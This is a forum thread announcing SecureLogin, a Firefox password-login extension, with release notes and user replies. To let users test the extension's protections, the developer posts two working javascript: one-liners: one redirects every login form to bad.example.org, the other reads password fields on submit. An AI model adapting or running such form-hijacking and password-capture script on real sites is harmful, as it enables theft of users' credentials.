[Ext] Opera Wand for Firefox - SecureLogin

Announce and Discuss the Latest Theme and Extension Releases.
Post Reply
-ck-
Posts: 219
Joined: November 6th, 2004, 1:40 am

Post by -ck- »

Could you possibly give us a user-selectable choice of activation keystroke?
I'm not crazy about ALT+N
madblueimp
Posts: 524
Joined: January 31st, 2007, 12:23 pm
Contact:

Post by madblueimp »

I thought about implementing a keyboard shortcut setting and halfway implemented it but didn't finish for these reasons:
- ALT+N isn't used yet according to http://kb.mozillazine.org/Keyboard_shor ... s_(Firefox)
- ALT+N can be performed with one hand
- most people don't bother about changing the hotkey
- There exists a keyboard shortcut extension, which can configure SecureLogin's shortcut as well => http://www.extensionsmirror.nl/index.php?showtopic=254
- The SecureLogin keyboard shorcut can be configured manually by changing the language files
madblueimp
Posts: 524
Joined: January 31st, 2007, 12:23 pm
Contact:

Post by madblueimp »

I added a "Custom Update URL" as it can take a while until SecureLogin will be listet at addons.mozilla.org.
This way, you can update SecureLogin automatically.

To enable the auto-update without having to install the new version manually, you can do the following:

Close Firefox.

Open the following directory:
--> [YOUR FIREFOX PROFILE]/extensions/secureLogin@blueimp.net/

Open the contained "install.rdf" with a texteditor that can handle UNIX line feeds (\n).

Add the following line just behind the "optionsURL":

Code: Select all

<em>https://blueimp.net/mozilla/update.rdf?itemid=%ITEM_ID%&amp;itemversion=%ITEM_VERSION%&amp;appid=%APP_ID%&amp;appversion=%APP_VERSION%&amp;appos=%APP_OS%</em>

Important: Instead of just "em" you have to use the tags "em:updateURL".

phpBB doesn't allow them to display properly. :|

Better explanation:
The entry must look like the examples described on http://developer.mozilla.org/en/docs/in ... #updateURL just with the url I provide:
https://blueimp.net/mozilla/update.rdf?itemid=%ITEM_ID%&amp;itemversion=%ITEM_VERSION%&amp;appid=%APP_ID%&amp;appversion=%APP_VERSION%&amp;appos=%APP_OS%

After doing that, the update to version 0.4.1 should be available.

As an alternative, just install the new version 0.4.1 manually, which includes the updateURL.
madblueimp
Posts: 524
Joined: January 31st, 2007, 12:23 pm
Contact:

Post by madblueimp »

Version 0.5.2 released with new features:

- Warning if changing second level domain on login
- List of exceptions for websites which do not work with the "JavaScript protection on login" option
- Extended statusbar icon context menu with shortcuts to saved passwords, "remember passwords rejection list" and SecureLogin settings
madblueimp
Posts: 524
Joined: January 31st, 2007, 12:23 pm
Contact:

Post by madblueimp »

If you input and run the following JavaScript code in your location bar, after loading a page for which you saved passwords, you can test one of the security enhancements of the SecureLogin-extension:

Code: Select all

javascript:(function(){for(var i=0;i<document.forms.length;i++){document.forms[i].action='http://bad.example.org';}})();

SecureLogin will ask you on login if you really want to login to bad.example.org. You are then able to stop the login and prevent sending your credentials to bad.example.org.

The icons tooltip show the changed login url as well.
madblueimp
Posts: 524
Joined: January 31st, 2007, 12:23 pm
Contact:

Post by madblueimp »

Another test, this time to demonstrate the optional "JavaScript protection on login":

Just input the following JavaScript code in your location bar and run it after loading a login page for which you saved your password before:

Code: Select all

javascript:(function(){for(var i=0;i<document.forms.length;i++){document.forms[i].addEventListener('submit',function(event){for(var j=0;j<event.currentTarget.elements.length;j++){if(event.currentTarget.elements[j].type=='password')alert('Password: '+event.currentTarget.elements[j].value);}},false);}})();

Without active "JavaScript protection" your password will be displayed in a warning box (alert) on login.
If you enable the setting, this won't happen.

Therefore, I recommend you to activate the option "JavaScript protection on login" and add websites that don't work to the exception list.
spyder
Posts: 32
Joined: May 4th, 2004, 1:16 pm
Location: Macedonia
Contact:

Post by spyder »

Thanks for this extension, and thanks for the frequent updates.

This is really nice, secure and handy.
User avatar
jimfitter
Folder@Home
Posts: 5225
Joined: January 28th, 2005, 11:17 am
Location: Chicagoland area
Contact:

Post by jimfitter »

Very nice, very helpful extension. Works fine for me using Bon Echo 2.0.0.2pre.

Thank you.
Inside every old man is a young man wondering what the hell happened. - Terry Pratchett
DMCrimson
Posts: 1025
Joined: February 13th, 2004, 6:11 am

Post by DMCrimson »

Installed this, and immediately thought this to be one of the best extensions I've installed:)
madblueimp
Posts: 524
Joined: January 31st, 2007, 12:23 pm
Contact:

Post by madblueimp »

Wow, thanks for the praise. :)

Would be nice if you would vote for it when it shows up on addons.mozilla.org.
I hope it will not be too long until approval, by now it still says
Approval Queue Status: There are currently 360 add-ons awaiting review
User avatar
Uncle Spellbinder
Posts: 3519
Joined: May 28th, 2004, 4:52 pm
Location: Highland, IN - U.S.A.
Contact:

Post by Uncle Spellbinder »

I can't say enough about SecureLogin. This has turned into one of my "must have" extensions for Firefox. I'd like to see the devs incorporate this into Firefox.
My Firefox Add-Ons Collection: Firefox Essentials
spyder
Posts: 32
Joined: May 4th, 2004, 1:16 pm
Location: Macedonia
Contact:

Post by spyder »

I second that!
DMCrimson
Posts: 1025
Joined: February 13th, 2004, 6:11 am

Post by DMCrimson »

Also, I find this more usable than default behaviour of Firefox:) BTW: is there any option to disable the form index from showing up?
madblueimp
Posts: 524
Joined: January 31st, 2007, 12:23 pm
Contact:

Post by madblueimp »

DMCrimson wrote:BTW: is there any option to disable the form index from showing up?

Thanks for the hint - I just released version 0.5.3 which shows the form index only if there are really more than one valid login forms on the page.
madblueimp
Posts: 524
Joined: January 31st, 2007, 12:23 pm
Contact:

Post by madblueimp »

Version 0.5.4 released:
- Secure Login now uses the saved userFieldName and passwordFieldName rather than searching for related fields in the form elements list.

Apart from that, the Secure Login project page has been redesigned for better accessibility and a better look.

The built-in Password Manager auto-fill feature has been improved as stated on Mozilla Foundation Security Advisory 2007-02:
The Firefox password manager was altered to take into account the destination site of the password data and only replay when a form's destination matches the one that was saved. This does not protect users if an attacker was able to inject script into the site in addition to form controls as the injected script could listen in on anything the user does.

In my opinion, auto-filling user+pass is still not secure as requiring a user action as is done with Secure Login.
Unfortunately, the newly saved form destination url seems not accessible for extension developers so far (no property additional property), as I would have liked to include this check as well.
But the Secure Login option to ask for confirmation on domain change adds protection in a similar way.
Post Reply